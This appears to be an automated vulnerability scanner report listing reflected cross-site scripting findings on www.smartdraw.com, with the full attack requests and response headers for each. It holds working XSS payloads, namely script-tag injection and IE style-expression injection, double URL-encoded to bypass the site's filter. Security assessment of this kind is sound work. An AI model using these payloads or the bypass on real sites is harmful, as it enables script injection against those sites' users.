The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049 was submitted in the REST URL parameter 1. This input was echoed as 7e0fd"style="x:expression(alert(1))"c7b5f3c9049 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: ASP.NET_SessionId=muhiv555hhwxlq45i4d30a2z; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8711 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db was submitted in the REST URL parameter 2. This input was echoed as ba1e3"style="x:expression(alert(1))"9c5fd0e07db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads/x22ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=jpp44c45no3vndyg0eiqfdaq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 was submitted in the REST URL parameter 2. This input was echoed as 53118"style="x:expression(alert(1))"c23085e6306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads/53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/ Set-Cookie: ASP.NET_SessionId=slhjyjfmrcmjlrjjdpmdykfr; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.144. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c9a5"style="x:expression(alert(1))"c2aa39074d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads/x22?5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ssgwag55ef2suzf5q24jnl45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.145. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43ce2"style="x:expression(alert(1))"09bdff38fc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads/x22?43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/ Set-Cookie: ASP.NET_SessionId=tew4y345qibicu55t1rjfuqe; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44 was submitted in the REST URL parameter 1. This input was echoed as 94da6"style="x:expression(alert(1))"861bf406f44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44/charts/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=3yzxhc55ehds33jqb4uatink; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3 was submitted in the REST URL parameter 1. This input was echoed as a48df"style="x:expression(alert(1))"d7925e086c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /examplesa48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3/charts/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ty0lqe55q5mcnibk2sdorqzz; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8816 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498 was submitted in the REST URL parameter 1. This input was echoed as 4a543"style="x:expression(alert(1))"ac716871498 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498/reviews HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8739 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=3c4tc255quiohy55truamgmu; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1 was submitted in the REST URL parameter 1. This input was echoed as 7bfab"style="x:expression(alert(1))"fd877cbaba1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1/reviews HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: ASP.NET_SessionId=irozqj45lpljwj55wgoccn55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d was submitted in the REST URL parameter 1. This input was echoed as 7aea0"><script>alert(1)</script>c7ddeeb9a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: ASP.NET_SessionId=1fckz3ilanwcrr45tvw5eu55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8949 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339 was submitted in the REST URL parameter 1. This input was echoed as cc399"><script>alert(1)</script>aa008f34339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/ Set-Cookie: ASP.NET_SessionId=0vufwvz10dn1v0up3yasccey; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8900 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 was submitted in the REST URL parameter 2. This input was echoed as a75f4"style="x:expression(alert(1))"4417cefb817 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/ Set-Cookie: ASP.NET_SessionId=fv4eqq55u13gyheum3ewifj0; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8739 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323 was submitted in the REST URL parameter 2. This input was echoed as 96803"><script>alert(1)</script>dfbbf862323 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:51 GMT Content-Length: 8900 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/ Set-Cookie: ASP.NET_SessionId=smkoxh55k01vvq55ighs2efj; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a was submitted in the REST URL parameter 2. This input was echoed as f5bf0"><script>alert(1)</script>a7aeb62331a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/reviewsf5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a?id=349540/x22/x3eSmartDraw HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/ Set-Cookie: ASP.NET_SessionId=b4ntfe451a35d0z3actuq255; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8949 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 was submitted in the REST URL parameter 2. This input was echoed as 6bd2b"style="x:expression(alert(1))"f1b2d917b08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/reviews6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:36 GMT Content-Length: 8788 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/ Set-Cookie: ASP.NET_SessionId=sktfbrnh1dtwviaawiverx45; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5812"><script>alert(1)</script>d208eaaaa24 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b82"><script>alert(1)</script>2e1c8977753 was submitted in the id parameter. This input was echoed unmodified in the application's response.
